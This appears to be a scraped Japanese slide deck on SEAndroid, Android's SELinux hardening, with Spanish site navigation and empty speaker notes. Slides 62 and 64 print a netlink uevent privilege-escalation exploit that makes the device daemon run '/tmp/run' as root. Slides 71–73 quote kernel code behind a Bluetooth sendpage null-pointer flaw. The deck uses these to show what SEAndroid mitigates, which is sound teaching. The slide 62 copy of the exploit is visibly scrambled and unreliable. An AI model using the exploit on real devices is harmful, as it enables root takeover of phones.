Más contenido relacionado
La actualidad más candente (20)
Similar a SEAndroid -AndroidのアーキテクチャとSE化について- (20)
Más de Hiromu Yakura (14)
SEAndroid -AndroidのアーキテクチャとSE化について-
- 15. Root権限
RootApp AppID 2
パーミッション パーミッション
SMS Internet
電話帳 GPS
Android OS
- 31. Role Base Access Control
ユーザーに対して「ロール」を設定
デフォルトではuser_t, staff_r, sysadm_r
SELinuxの設定を変更できるのはsysadm_rだけ
- 62. SEAndroidの有効事例(1)
SEAndroidの有効事例
Exploitコード
int main(int argc, char **argv)
{
int sock;
char *mp;
char message[4096];
struct msghdr msg;
struct iovec iovector;
struct sockaddr_nl address;
memset(&address, 0, sizeof(address));
address.nl_familyatoi(argv[1]);
address.nl_pid = = AF_NETLINK;
address.nl_groups (void*)&address;
msg.msg_name = = 0;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
sock = socket(AF_NETLINK, *) &address, sizeof(address));
bind(sock, (struct sockaddr SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
mp = message;
mp += sprintf(mp, "SUBSYSTEM=block") ++ 1;
mp += sprintf(mp, "DEVPATH=/dev/foo") 1;
mp += sprintf(mp, "ACTION=remove") +1;
mp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1;
iovector.iov_base = (void*)message;
iovector.iov_len&msg, 0);
sendmsg(sock, = (int)(mp-message);
close(sock);
return 0;
}
- 64. SEAndroidの有効事例(1)
SEAndroidの有効事例
Exploitコード
sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(sock, (struct sockaddr *) &address, sizeof(address));
mp = message;
mp += sprintf(mp, "SUBSYSTEM=block") + 1;
mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
mp += sprintf(mp, "ACTION=remove") +1;
mp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
sendmsg(sock, &msg, 0);
close(sock);
- 71. SEAndroidの有効事例(2)
SEAndroidの有効事例
net/socket.c
static ssize_t sock_sendpage(struct file *file, struct page *page,
int offset, size_t size, loff_t *ppos, int more)
{
struct socket *sock;
int flags;
sock = file->private_data;
flags = !(file->f_flags & O_NONBLOCK) ? 0 : MSG_DONTWAIT;
if (more)
flags |= MSG_MORE;
return sock->ops->sendpage(sock, page, offset, size, flags);
}
これが初期化されていない
- 72. SEAndroidの有効事例(2)
SEAndroidの有効事例
net/bluetooth/l2cap_sock.c
static int l2cap_sock_create(struct net *net, struct socket *sock, int protocol)
{
struct sock *sk;
BT_DBG("sock %p", sock); l2cap_sock_opsを代入
/* 略 */
sock->ops = &l2cap_sock_ops;
sk = l2cap_sock_alloc(net, sock, protocol, GFP_ATOMIC);
if (!sk)
return -ENOMEM;
l2cap_sock_init(sk, NULL);
return 0;
}
- 73. SEAndroidの有効事例(2)
SEAndroidの有効事例
net/bluetooth/l2cap.c
static const struct proto_ops l2cap_sock_ops = {
.family
.owner
= PF_BLUETOOTH,
= THIS_MODULE,
sendpageが存在しない
.release = l2cap_sock_release,
.bind = l2cap_sock_bind,
.poll = bt_sock_poll,
.ioctl = bt_sock_ioctl,
.mmap = sock_no_mmap,
.socketpair = sock_no_socketpair,
.shutdown = l2cap_sock_shutdown,
.setsockopt = l2cap_sock_setsockopt,
.getsockopt = l2cap_sock_getsockopt
};
Notas del editor
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n